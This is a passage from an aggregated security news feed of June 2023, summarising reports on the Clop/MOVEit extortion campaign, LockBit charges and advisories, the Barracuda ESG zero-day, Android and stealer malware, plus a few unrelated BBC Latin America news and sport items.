                Autosummary: ​Various other Iowa school districts, such as the Cedar Rapids Community School District, the Davenport Community School District, and the Linn-Mar Community School District, have also been hit by ransomware last year, according to a Des Moines Register report. "


                US dangles $10 million reward for information about Cl0p ransomware gang

                exploits ransomware
                2023-06-19 https://www.malwarebytes.com/blog/news/2023/06/rewards-up-to-10-million-for-information-about-cl0p-ransomware-operation

                Categories: News

                Categories: Ransomware

                Tags: Cl0p

                Tags: ransomware

                Tags: RFJ

                Tags: 10 million

                Tags: MOVEit

                Rewards for Justice (RFJ) is offering a reward of up to $10 million for information the Cl0p ransomware gang is acting at the direction or under the control of a foreign government.


                The post US dangles $10 million reward for information about Cl0p ransomware gang appeared first on Malwarebytes Labs.

                "

                Autosummary: The US Department of State’s national security rewards program, Rewards for Justice (RFJ), is offering a reward of up to $10 million for information linking the Cl0p ransomware gang, or any other malicious cyber actors targeting US critical infrastructure, to a foreign government. RFJ’s statutory authorities offer rewards for information in four broad categories, one of which is Malicious Cyber Activity: information that identifies or locates any individual who, while acting at the direction or under the control of a foreign government, aids or abets a violation of the Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030.


                Phishing scam takes $950k from DoorDash drivers

                financial
                2023-06-19 https://www.malwarebytes.com/blog/news/2023/06/phishing-scam-takes-950k-from-doordash-drivers

                Categories: Business

                Tags: door dash

                Tags: delivery

                Tags: phish

                Tags: phishing

                Tags: scam

                Tags: fake

                Tags: fraud

                Tags: theft

                Tags: call

                Tags: support

                Tags: phone

                We take a look at a phishing scam that cost 700 DoorDash drivers a combined total of roughly $950k.


                The post Phishing scam takes $950k from DoorDash drivers appeared first on Malwarebytes Labs.

                "

                Autosummary: Phishing attacks often seem to come from brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. If you fall for a phish, make your data useless: if you entered a password, change it; if you entered credit card details, change the card.


                Week in review: Fortinet patches pre-auth RCE, Switzerland under cyberattack

                ciber
                2023-06-18 https://www.helpnetsecurity.com/2023/06/18/week-in-review-fortinet-patches-pre-auth-rce-switzerland-under-cyberattack/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Building a culture of security awareness in healthcare begins with leadership In this Help Net Security interview, Ken Briggs, General Counsel at Salucro, discusses how fostering a culture of security awareness has become paramount for healthcare organizations. Building a hyper-connected future with 6G networks In this Help Net Security interview, Shamik Mishra, Capgemini‘s CTO of Connectivity, delves into the emerging … More

                The post Week in review: Fortinet patches pre-auth RCE, Switzerland under cyberattack appeared first on Help Net Security.

                "

                Autosummary: Building a hyper-connected future with 6G networks In this Help Net Security interview, Shamik Mishra, Capgemini‘s CTO of Connectivity, delves into the emerging themes and technologies shaping 6G, its performance metrics compared to 5G, the role of advanced AI algorithms, the impact of higher frequencies, and the geopolitical race for 6G leadership. New infosec products of the week: June 16, 2023 Here’s a look at the most interesting products from the past week, featuring releases from NETSCOUT, Okta, Quantinuum, Seceon, and Zilla Security. "


                US govt offers $10 million bounty for info linking Clop ransomware gang to a foreign government.

                exploits government ransomware
                2023-06-18 https://securityaffairs.com/147577/cyber-crime/clop-ransomware-reward.html

                The U.S. government announced up to a $10 million bounty for information linking the Clop ransomware gang to a foreign government. The US government is offering up to a $10 million bounty for information linking the CL0P Ransomware Gang, or any other threat actors targeting U.S. critical infrastructure, to a foreign government. The bounty is covered […]

                The post US govt offers $10 million bounty for info linking Clop ransomware gang to a foreign government. appeared first on Security Affairs.

                "

                Autosummary: Rewards for Justice (@RFJ_USA) posted on June 16, 2023: “You could be eligible for a reward. #StopRansomware”. The U.S. State Department’s Rewards for Justice (RFJ) program is a government counterterrorism rewards program that offers monetary rewards for information leading to the prevention, disruption, or conviction of individuals involved in acts against U.S. interests.


                Brazil 4-1 Guinea: Brazil wear all-black kit in anti-racism message

                latam
                2023-06-18 https://www.bbc.co.uk/sport/football/65941621?at_medium=RSS&at_campaign=KARANGA
                Brazil play in an all-black kit for the first half of their win against Guinea in Spain as part of an anti-racism campaign. "

                Autosummary: "


                BlackCat ransomware gang behind Reddit breach from February

                exploits ransomware
                2023-06-18 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-gang-behind-reddit-breach-from-february/
                The BlackCat (ALPHV) ransomware gang is behind a February cyberattack on Reddit, where the threat actors claim to have stolen 80GB of data from the company. [...] "

                Autosummary: "After successfully obtaining a single employee"s credentials, the attacker gained access to some internal docs, code, as well as some internal dashboards and business systems," explained a post by Reddit CTO Christopher Slowe, aka KeyserSosa. "


                New Mystic Stealer malware increasingly used in attacks

                exploits
                2023-06-18 https://www.bleepingcomputer.com/news/security/new-mystic-stealer-malware-increasingly-used-in-attacks/
                A new information-stealing malware named "Mystic Stealer" has been promoted on hacking forums and darknet markets since April 2023, quickly gaining traction in the cybercrime community. [...]

                Autosummary: Notable entries in the list include: Google Chrome, Mozilla Firefox, Microsoft Edge, Opera, Vivaldi, Brave-Browser, Binance, Exodus, Bitcoin, Litecoin, Electrum, Authy 2FA, Gauth Authenticator, EOS Authenticator, LastPass: Free Password Manager, Trezor Password Manager, RoboForm Password Manager, Dashlane — Password Manager, NordPass Password Manager & Digital Vault, Browserpass, MYKI Password Manager & Authenticator.


                Reddit Files: BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit

                exploits ransomware
                2023-06-18 https://securityaffairs.com/147591/data-breach/reddit-files-blackcat-alphv-ransomware.html

                The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit in a February cyberattack. In February, the social news aggregation platform Reddit suffered a security breach; attackers gained unauthorized access to internal documents, code, and some business systems. The company announced it was hit by a sophisticated and highly-targeted attack that took […]

                The post Reddit Files: BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit appeared first on Security Affairs.


                Autosummary: The BlackCat/ALPHV ransomware gang has been active since November 2021; the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, Swissport, NCR, and Western Digital.


                From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet

                industry
                2023-06-17 https://thehackernews.com/2023/06/from-cryptojacking-to-ddos-attacks.html
                Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot, revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it’s also the name of the Romanian organized crime and anti-terrorism policing unit," Cado Security said in a technical report. "In addition,

                Autosummary: History - A shell script that’s designed to run Update. The SSH brute-forcer tool (aka aliases), for its part, parses the text file output of Chrome to break into each of the identified IP addresses, and if successful, establishes a remote connection to the IP address.


                US govt offers $10 million bounty for info on Clop ransomware

                exploits ransomware
                2023-06-17 https://www.bleepingcomputer.com/news/security/us-govt-offers-10-million-bounty-for-info-on-clop-ransomware/
                The U.S. State Department’s Rewards for Justice program announced up to a $10 million bounty yesterday for information linking the Clop ransomware attacks to a foreign government. [...]

                Autosummary: Initially launched to gather information on terrorists targeting U.S. interests, the program has since expanded to include information on cyber criminals, such as the Conti ransomware operation, Russian Sandworm hackers, REvil ransomware, and the Evil Corp hacking group.


                Cybercriminals return to business as usual in a post-pandemic world

                ciber
                2023-06-16 https://www.helpnetsecurity.com/2023/06/16/post-pandemic-threat-landscape/

                After two years of pandemic-induced disruption, 2022 was a return to business as usual for the world’s cybercriminals, according to Proofpoint. As COVID-19 medical and economic programs began to wind down, attackers had to find new ways to make a living by honing their social engineering skills, commoditising once-sophisticated attack techniques, and creatively searching for new opportunities in unexpected places. Creativity among threat actors From scaling brute-force and targeted attacks on cloud tenants to the … More

                The post Cybercriminals return to business as usual in a post-pandemic world appeared first on Help Net Security.


                Autosummary: “With Microsoft 365 forming a large percentage of the typical organization’s attack surface, broad abuse of that platform, from Office macros to OneNote documents, continues to shape the broad outlines of the threat landscape,” said Ryan Kalember, EVP, cybersecurity strategy, Proofpoint.


                Cybersecurity culture improves despite the dark clouds of the past year

                ciber
                2023-06-16 https://www.helpnetsecurity.com/2023/06/16/material-cyber-breaches/

                Despite a hardening economic climate, heightened global tensions and the onset of new technology making cybercrime easier, 76% of CISOs suggested that no material breaches had occurred and 60% said that no material cybersecurity incident had occurred in the past 12 months, according to ClubCISO and Telstra Purple. This apparent success of security teams is particularly interesting given that CISOs on average rated their organization’s overall security posture lower than they did over the … More

                The post Cybersecurity culture improves despite the dark clouds of the past year appeared first on Help Net Security.


                Autosummary: Digging into the cultural improvements in more detail, proactive ‘report it’ no-blame policies (41%), simulated phishing (38%) and tailored training (37%) remain as the other key drivers of security culture.


                Third Flaw Uncovered in MOVEit Transfer App Amidst Cl0p Ransomware Mass Attack

                exploits ransomware
                2023-06-16 https://thehackernews.com/2023/06/third-flaw-uncovered-in-moveit-transfer.html
                Progress Software on Thursday disclosed a third vulnerability impacting its MOVEit Transfer application, as the Cl0p cybercrime gang deployed extortion tactics against affected companies. The new flaw, which is yet to be assigned a CVE identifier, also concerns an SQL injection vulnerability that "could lead to escalated privileges and potential unauthorized access to the environment." The



                20-Year-Old Russian LockBit Ransomware Affiliate Arrested in Arizona

                exploits ransomware rusia-ucrania
                2023-06-16 https://thehackernews.com/2023/06/20-year-old-russian-lockbit-ransomware.html
                The U.S. Department of Justice (DoJ) on Thursday unveiled charges against a Russian national for his alleged involvement in deploying LockBit ransomware to targets in the U.S., Asia, Europe, and Africa. Ruslan Magomedovich Astamirov, 20, of Chechen Republic has been accused of perpetrating at least five attacks between August 2020 and March 2023. He was arrested in the state of Arizona last

                Autosummary: The DoJ statement also comes a day after cybersecurity authorities from Australia, Canada, France, Germany, New Zealand, the U.K., and the U.S. released a joint advisory warning of LockBit ransomware.


                Activities in the Cybercrime Underground Require a New Approach to Cybersecurity

                ciber
                2023-06-16 https://thehackernews.com/2023/06/activities-in-cybercrime-underground.html
                As Threat Actors Continuously Adapt their TTPs in Today’s Threat Landscape, So Must You. Earlier this year, threat researchers at Cybersixgill released the annual report, The State of the Cybercrime Underground. The research stems from an analysis of Cybersixgill’s collected intelligence items throughout 2022, gathered from the deep, dark and clear web. The report examines the continuous

                Autosummary: The significant decline in credit card fraud is due mainly to the following: Improvements in authentication and fraud prevention – Banks and financial institutions are using advanced authentication and "passwordless" methods that make it harder to compromise a card, such as biometric authentication (e.g., fingerprints and face recognition), as well as PINs, EMV chips, and multi-factor authentication (MFA). E-commerce security improvements – Since 2021, e-commerce sites have been using more robust security measures, such as two-factor authentication (2FA), address verification systems, and secure payment systems adhering to PCI DSS, making it harder for cybercriminal threat actors to steal credit card data from consumers. As cryptocurrency has gained broader adoption for legitimate purposes, it’s also become a target for threat actors, presenting new opportunities for "crypto-jacking," digital wallet takeovers, crypto-mining, and siphoning digital assets from crypto exchanges.


                Dengue fever crisis forces Peru minister to resign

                latam
                2023-06-16 https://www.bbc.co.uk/news/world-latin-america-65930736?at_medium=RSS&at_campaign=KARANGA
                Health Minister Rosa Gutiérrez quits with the country in the grip of a deadly dengue fever outbreak.



                Millions of Oregon, Louisiana state IDs stolen in MOVEit breach

                government
                2023-06-16 https://www.bleepingcomputer.com/news/security/millions-of-oregon-louisiana-state-ids-stolen-in-moveit-breach/
                Louisiana and Oregon warn that millions of driver’s licenses were exposed in a data breach after a ransomware gang hacked their MOVEit Transfer secure file transfer systems to steal stored data. [...]

                Autosummary: The OMV says that those impacted likely had the following personal information exposed: Name, Address, Social Security Number, Birth date, Height, Eye Color, Driver’s License Number, Vehicle Registration Information, Handicap Placard Information. However, the agency says there is no indication that Clop used, sold, shared, or released any of that data, so the stolen data may have been deleted as the ransomware actors promised in their announcement to delete any stolen government data.


                Oil and gas giant Shell is another victim of Clop ransomware attacks

                exploits ransomware industry
                2023-06-16 https://securityaffairs.com/147545/cyber-crime/shell-clop-ransomware-attacks.html

                British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group. Oil and gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign conducted by the Clop gang exploiting a MOVEit zero-day vulnerability. Threat actors are actively exploiting the zero-day vulnerability, tracked […]

                The post Oil and gas giant Shell is another victim of Clop ransomware attacks appeared first on Security Affairs.




                The Week in Ransomware - June 16th 2023 - Wave of Extortion

                exploits ransomware
                2023-06-16 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-16th-2023-wave-of-extortion/
                The MOVEit Transfer extortion attacks continue to dominate the news cycle, with the Clop ransomware operation now extorting organizations breached in the attacks. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @DanielGallagher, @malwrhunterteam, @BleepinComputer, @VK_Intel, @LawrenceAbrams, @PolarToffee, @struppigel, @jorntvdw, @Ionut_Ilascu, @FourOctets, @serghei, @fwosar, @Seifreed, @malwareforme, @demonslay335, @AuCyble, @pcrisk, @FortiGuardLabs, @1ZRR4H, @SentinelOne, @SttyK, @juanbrodersen, @AShukuhi, @BrettCallow, @Jon__DiMaggio, and @snlyngaas.


                MOVEit discloses THIRD critical vulnerability

                exploits
                2023-06-16 https://www.malwarebytes.com/blog/news/2023/06/moveit-discloses-yet-another-vulnerability-three-times-a-charm

                Categories: Exploits and vulnerabilities, News, Ransomware

                Tags: Progress, Moveit, CVE-2023-34362, CVE-2023-35036, Cl0p

                Progress has released an advisory about yet another MOVEit Transfer vulnerability while new victims of the first one keep emerging.


                The post MOVEit discloses THIRD critical vulnerability appeared first on Malwarebytes Labs.


                Autosummary: Victims have been identified in the UK, US, Germany, Austria, Switzerland, Luxembourg, France, and the Netherlands. Among the probably hundreds of victims are payroll provider Zellis, who serves British Airways and the BBC, oil giant Shell, several financial services organizations, insurance companies, and many others. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


                Fake security researchers push malware files on GitHub

                exploits
                2023-06-16 https://www.malwarebytes.com/blog/news/2023/06/fake-security-researchers-push-malware-files-on-github

                Categories: News

                Tags: GitHub, malware, repository, security researcher, fake, download, scam, twitter, social

                We take a look at reports of fake security researchers offering up malware downloads via GitHub repositories.


                The post Fake security researchers push malware files on GitHub appeared first on Malwarebytes Labs.


                Autosummary: GitHub accounts: github.com/AKuzmanHSCS, github.com/RShahHSCS, github.com/BAdithyaHSCS, github.com/DLandonHSCS, github.com/MHadzicHSCS, github.com/GSandersonHSCS, github.com/SSankkarHSCS. Malicious repositories: github.com/AKuzmanHSCS/Microsoft-Exchange-RCE, github.com/MHadzicHSCS/Chrome-0-day, github.com/GSandersonHSCS/discord-0-day-fix, github.com/BAdithyaHSCS/Exchange-0-Day, github.com/RShahHSCS/Discord-0-Day-Exploit, github.com/DLandonHSCS/Discord-RCE, github.com/SSankkarHSCS/Chromium-0-Day. If any of the above look familiar, and if you recognise any of the usernames from their matching Twitter accounts, it may well be time to run some security scans on your PC. The GitHub pages also leaned into social aspects, making use of popular tags like “discordapp”, “cve”, and “rce-exploits” to draw more potential victims in to look at the rogue pages.


                A Russian national charged for committing LockBit Ransomware attacks

                exploits ransomware rusia-ucrania
                2023-06-16 https://securityaffairs.com/147551/cyber-crime/lockbit-ransomware-member-arrested.html

                DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses. The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous LockBit ransomware attacks against systems in the United States, Asia, Europe, and Africa. The US authorities arrested the man […]

                The post A Russian national charged for committing LockBit Ransomware attacks appeared first on Security Affairs.


                Autosummary: The operation targeted many organizations in critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. In May, the US Justice Department charged Russian national Mikhail Pavlovich Matveev (30), aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar, for his alleged role in multiple ransomware attacks.


                Mapping the search for Colombia’s plane crash children

                latam
                2023-06-16 https://www.bbc.co.uk/news/world-latin-america-65915078?at_medium=RSS&at_campaign=KARANGA
                The strategy used to track down four children lost in the Colombian jungle, visualised.



                How cybercriminals target energy companies

                industry ciber
                2023-06-15 https://www.helpnetsecurity.com/2023/06/15/how-cybercriminals-target-energy-companies-video/

                In this Help Net Security video, Jim Simpson, Director of Threat Intelligence at Searchlight Cyber, discusses how cybercriminals employ specialized strategies when targeting energy companies. This is primarily due to the sensitive and valuable information these organizations hold and their critical role in infrastructure, making them particularly attractive for economic and geopolitical disruption. Energy companies are routinely discussed on dark web forums, with threat actors frequently auctioning initial access via remote software, VPNs, and stolen … More

                The post How cybercriminals target energy companies appeared first on Help Net Security.




                Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent

                government rusia-ucrania
                2023-06-15 https://thehackernews.com/2023/06/microsoft-warns-of-new-russian-state.html
                Microsoft on Wednesday took the lid off a "novel and distinct Russian threat actor," which it said is linked to the General Staff Main Intelligence Directorate (GRU) and has a "relatively low success rate." The tech giant’s Threat Intelligence team, which was previously tracking the group under its emerging moniker DEV-0586, has graduated it to a named actor dubbed Cadet Blizzard. "Cadet

                Autosummary: The state-sponsored actor, per Microsoft, has a track record of orchestrating destructive attacks, espionage, and information operations aimed at entities located in Ukraine, Europe, Central Asia, and, periodically, Latin America.


                LockBit Ransomware Extorts $91 Million from U.S. Companies

                exploits ransomware
                2023-06-15 https://thehackernews.com/2023/06/lockbit-ransomware-extorts-91-million.html
                The threat actors behind the LockBit ransomware-as-a-service (RaaS) scheme have extorted $91 million following hundreds of attacks against numerous U.S. organizations since 2020. That’s according to a joint bulletin published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (

                Autosummary: That’s according to a joint bulletin published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and other partner authorities from Australia, Canada, France, Germany, New Zealand, and the U.K. "The LockBit ransomware-as-a-service (RaaS) attracts affiliates to use LockBit for conducting ransomware attacks, resulting in a large web of unconnected threat actors conducting wildly varying attacks," the agencies said.


                Cybersecurity agencies published a joint LockBit ransomware advisory

                exploits ransomware ciber
                2023-06-15 https://securityaffairs.com/147482/cyber-crime/lockbit-ransomware-advisory.html

                The LockBit ransomware group successfully extorted roughly $91 million from approximately 1,700 U.S. organizations since 2020. According to a joint advisory published by cybersecurity agencies, the LockBit ransomware group has successfully extorted roughly $91 million in about 1,700 attacks against U.S. organizations since 2020. The advisory was published by Cybersecurity and Infrastructure Security Agency (CISA), […]

                The post Cybersecurity agencies published a joint LockBit ransomware advisory appeared first on Security Affairs.


                Autosummary: The advisory was published by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the following international agencies: Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), United Kingdom’s National Cyber Security Centre (NCSC-UK), National Cybersecurity Agency of France (ANSSI).


                Warning: GravityRAT Android Trojan Steals WhatsApp Backups and Deletes Files

                exploits
                2023-06-15 https://thehackernews.com/2023/06/warning-gravityrat-android-trojan.html
                An updated version of an Android remote access trojan dubbed GravityRAT has been found masquerading as messaging apps BingeChat and Chatico as part of a narrowly targeted campaign since June 2022. "Notable in the newly discovered campaign, GravityRAT can exfiltrate WhatsApp backups and receive commands to delete files," ESET researcher Lukáš Štefanko said in a new report published today. "The

                Autosummary: GravityRAT, like most Android backdoors, requests intrusive permissions under the garb of a seemingly legitimate app to harvest sensitive information such as contacts, SMSes, call logs, files, location data, and audio recordings without the victim’s knowledge.


                New Supply Chain Attack Exploits Abandoned S3 Buckets to Distribute Malicious Binaries

                exploits
                2023-06-15 https://thehackernews.com/2023/06/new-supply-chain-attack-exploits.html
                In what’s a new kind of software supply chain attack aimed at open source projects, it has emerged that threat actors could seize control of expired Amazon S3 buckets to serve rogue binaries without altering the modules themselves. "Malicious binaries steal the user IDs, passwords, local machine environment variables, and local host name, and then exfiltrate the stolen data to the hijacked

                Autosummary: "Malicious binaries steal the user IDs, passwords, local machine environment variables, and local host name, and then exfiltrate the stolen data to the hijacked bucket," Checkmarx researcher Guy Nachshon said.


                Android GravityRAT malware now steals your WhatsApp backups

                exploits
                2023-06-15 https://www.bleepingcomputer.com/news/security/android-gravityrat-malware-now-steals-your-whatsapp-backups/
                A new Android malware campaign spreading the latest version of GravityRAT has been underway since August 2022, infecting mobile devices with a trojanized chat app named "BingeChat," which attempts to steal data from victims’ devices. [...]

                Autosummary: Additionally, media and document files of the jpg, jpeg, log, png, PNG, JPG, JPEG, txt, pdf, xml, doc, xls, xlsx, ppt, pptx, docx, opus, crypt14, crypt12, crypt13, crypt18, and crypt32 types are also stolen.


                Clop ransomware gang starts extorting MOVEit data-theft victims

                exploits ransomware
                2023-06-15 https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-starts-extorting-moveit-data-theft-victims/
                The Clop ransomware gang has started extorting companies impacted by the MOVEit data theft attacks by listing them on a data leak site, a common extortion tactic used as a precursor for the public leaking of stolen data. [...]



                Barracuda ESG zero-day attacks linked to suspected Chinese hackers

                exploits
                2023-06-15 https://www.bleepingcomputer.com/news/security/barracuda-esg-zero-day-attacks-linked-to-suspected-chinese-hackers/
                A suspected pro-China hacker group tracked by Mandiant as UNC4841 has been linked to data-theft attacks on Barracuda ESG (Email Security Gateway) appliances using a now-patched zero-day vulnerability. [...]

                Autosummary: (Figure: Vulnerable Barracuda code. Source: Mandiant) Once the threat actors gained remote access to the Barracuda ESG device, they infected it with malware families known as "Saltwater," "Seaspy," and "Seaside" to steal email data from the devices. (Figure: The Seaspy attack diagram. Source: Mandiant) Finally, there’s "Sandbar," which the threat actors used for hiding Linux server processes whose name starts with "Bar," which cloaks the activities of Seaspy in particular, allowing it to operate undetected.


                Russian hackers use PowerShell USB malware to drop backdoors

                exploits rusia-ucrania
                2023-06-15 https://www.bleepingcomputer.com/news/security/russian-hackers-use-powershell-usb-malware-to-drop-backdoors/
                The Russian state-sponsored hacking group Gamaredon (aka Armageddon, or Shuckworm) continues to target critical organizations in Ukraine’s military and security intelligence sectors, employing a refreshed toolset and new infection tactics. [...]

                Autosummary: The LNKs created by the script take a broad range of names, some selected specifically to pique the victim’s interest, like: weapons_list.rtf.lnk, secret.rtf.lnk, pornophoto.rtf.lnk, my_photos.rtf.lnk, login_password.docx.lnk, compromising_evidence.rtf.lnk, instructions.rtf.lnk, account_card.rtf.lnk, bank_accоunt.rtf.lnk. Once the victim launches those files, the PowerShell script enumerates all drives on the computer and copies itself to removable USB disks, increasing the likelihood of successful lateral movement within the breached network.


                Suspected LockBit ransomware affiliate arrested, charged in US

                exploits ransomware
                2023-06-15 https://www.bleepingcomputer.com/news/security/suspected-lockbit-ransomware-affiliate-arrested-charged-in-us/
                Russian national Ruslan Magomedovich Astamirov was arrested in Arizona and charged by the U.S. Justice Department for allegedly deploying LockBit ransomware on the networks of victims in the United States and abroad. [...]

                Autosummary: In May 2023, Mikhail Pavlovich Matveev (also known as Wazawaka, m1x, Boriselcin, and Uhodiransomwar) was also charged for his alleged involvement in deploying LockBit, Babuk, and Hive ransomware in attacks targeting organizations within and outside the United States.


                Ransomware Hackers and Scammers Utilizing Cloud Mining to Launder Cryptocurrency

                financial exploits
                2023-06-15 https://thehackernews.com/2023/06/ransomware-hackers-and-scammers.html
                Ransomware actors and cryptocurrency scammers have joined nation-state actors in abusing cloud mining services to launder digital assets, new findings reveal. "Cryptocurrency mining is a crucial part of our industry, but it also holds special appeal to bad actors, as it provides a means to acquire money with a totally clean on-chain original source," blockchain analytics firm Chainalysis said in

                Autosummary: "Cryptocurrency mining is a crucial part of our industry, but it also holds special appeal to bad actors, as it provides a means to acquire money with a totally clean on-chain original source," blockchain analytics firm Chainalysis said in a report shared with The Hacker News.


                Chinese UNC4841 Group Exploits Zero-Day Flaw in Barracuda Email Security Gateway

                exploits
                2023-06-15 https://thehackernews.com/2023/06/chinese-unc4841-group-exploits-zero-day.html
                A suspected China-nexus threat actor dubbed UNC4841 has been linked to the exploitation of a recently patched zero-day flaw in Barracuda Email Security Gateway (ESG) appliances since October 2022. "UNC4841 is an espionage actor behind this wide-ranging campaign in support of the People’s Republic of China," Google-owned Mandiant said in a new report published today, describing the group as

                Autosummary: Also deployed by the adversary is a kernel rootkit named SANDBAR that’s configured to conceal processes that begin with a specified name, as well as trojanized versions of two different valid Barracuda Lua modules: SEASPRAY, a launcher that screens incoming email attachments for a particular filename and runs an external C-based utility dubbed WHIRLPOOL to create a TLS reverse shell; and SKIPJACK, a passive implant that listens for incoming email headers and subjects and executes the content present in the "Content-ID" header field. Source code overlaps have been identified between SEASPY and a publicly available backdoor referred to as cd00r, and also between SANDBAR and an open-source rootkit, suggesting that the actor repurposed existing tools to orchestrate the intrusions.


                Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities

                exploits industry
                2023-06-15 https://thehackernews.com/2023/06/vidar-malware-using-new-tactics-to.html
                The threat actors behind the Vidar malware have made changes to their backend infrastructure, indicating attempts to retool and conceal their online trail in response to public disclosures about their modus operandi. "Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia," cybersecurity company Team Cymru said in a new analysis shared

                Autosummary: "By using VPN infrastructure, which in at least part was also utilized by numerous other benign users, it is apparent that the Vidar threat actors may be taking steps to anonymize their management activities by hiding in general Internet noise," Team Cymru noted.


                Barracuda ESG zero-day exploited by China-linked APT

                exploits
                2023-06-15 https://securityaffairs.com/147511/apt/barracuda-esg-zero-day-china-apt.html

                Experts linked the UNC4841 threat actor behind the attacks exploiting the recently patched Barracuda ESG zero-day to China. Mandiant researchers linked the threat actor UNC4841 behind the attacks that exploited the recently patched Barracuda ESG zero-day vulnerability to China. “Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset […]

                The post Barracuda ESG zero-day exploited by China-linked APT appeared first on Security Affairs.


                Autosummary: “Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for espionage, spanning a multitude of regions and sectors.” On May 30, 2023, the vendor provided a Preliminary Summary of Key Findings related to its investigation that includes a timeline of events, Indicators of Compromise (IOCs), and recommended actions for impacted customers.


                Peru archaeology: Ancient mummy found under rubbish dump

                latam
                2023-06-15 https://www.bbc.co.uk/news/world-latin-america-65915074?at_medium=RSS&at_campaign=KARANGA
                Archaeologists first spotted the hair of the 3,000-year-old mummy at the site of a rubbish dump.



                Rhysida ransomware leaks documents stolen from Chilean Army

                exploits latam ransomware
                2023-06-15 https://www.bleepingcomputer.com/news/security/rhysida-ransomware-leaks-documents-stolen-from-chilean-army/
                Threat actors behind a recently surfaced ransomware operation known as Rhysida have leaked online what they claim to be documents stolen from the network of the Chilean Army (Ejército de Chile). [...]

                Autosummary: Chilean Army entry on Rhysida's leak site (BleepingComputer). The Rhysida ransomware gang describes itself as a "cybersecurity team" that aims to help victims secure their networks, and it was first spotted by MalwareHunterTeam on May 17, 2023.


                LockBit ransomware advisory from CISA provides interesting insights

                exploits ransomware
                2023-06-15 https://www.malwarebytes.com/blog/news/2023/06/lockbit-ransomware-advisory-from-cisa-provides-interesting-insights

                Categories: News, Ransomware

                Tags: CISA, LockBit, stats, RaaS

                A joint advisory published by CISA, the FBI and many others shows some interesting stats that align with data found by Malwarebytes.

                The post LockBit ransomware advisory from CISA provides interesting insights appeared first on Malwarebytes Labs.


                Autosummary: The US Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing and Analysis Center (MS-ISAC), and the cybersecurity authorities of Australia, Canada, United Kingdom, Germany, France, and New Zealand (CERT NZ, NCSC-NZ) have all published a joint Cybersecurity Advisory about LockBit. To help organizations understand and defend against this global threat and its large number of unconnected LockBit affiliates, the advisory, titled Understanding Ransomware Threat Actors: LockBit, includes: a list of approximately 30 freeware and open-source tools used by LockBit actors; over 40 of their TTPs mapped to MITRE ATT&CK; observed common vulnerabilities and exposures (CVEs) used for exploitation; an evolution of LockBit RaaS (Ransomware as a Service) along with worldwide trends and statistics; and resources and services available from authoring agencies and recommended mitigations to help protect against the worldwide LockBit activity. The advisory points out that in 2022, LockBit was the most active global ransomware group and RaaS provider in terms of the number of victims claimed on its data leak site. In the US, however, the main target of almost every commercial ransomware group, LockBit is responsible for 16% of attacks on public entities, which include municipal and county governments, public higher education and K-12 schools, as well as vital services like law enforcement agencies.


                Argentina 2-0 Australia: Lionel Messi scores fastest career goal in Beijing friendly

                latam
                2023-06-15 https://www.bbc.co.uk/sport/football/65920186?at_medium=RSS&at_campaign=KARANGA
                Lionel Messi scores his fastest career goal as Argentina comfortably beat Australia in a friendly in Beijing.



                IT providers become go-to for cybersecurity advice

                ciber
                2023-06-14 https://www.helpnetsecurity.com/2023/06/14/security-trusted-partners/

                61% of SMBs have been hit by a successful cyberattack in the last year, according to BlackFog. The research study, which examined the business impact of cybersecurity for organizations in the US and UK, also revealed the growing importance of engaging with trusted partners to meet their security challenges. Businesses are also falling victim to repeat attacks, with 87% of IT decision makers stating they had experienced two or more successful attacks in the past … More

                The post IT providers become go-to for cybersecurity advice appeared first on Help Net Security.


                Autosummary: In fact, 26% rated providers and partners as the most highly trusted compared with colleagues in their company (21%), analysts (16%) and peers within other organizations (10%).


                Critical Security Vulnerability Discovered in WooCommerce Stripe Gateway Plugin

                exploits
                2023-06-14 https://thehackernews.com/2023/06/critical-security-vulnerability.html
                A security flaw has been uncovered in the WooCommerce Stripe Gateway WordPress plugin that could lead to the unauthorized disclosure of sensitive information. The flaw, tracked as CVE-2023-34000, impacts versions 7.4.0 and below. It was addressed by the plugin maintainers in version 7.4.1, which shipped on May 30, 2023. WooCommerce Stripe Gateway allows e-commerce websites to directly accept



                LLM meets Malware: Starting the Era of Autonomous Threat

                exploits
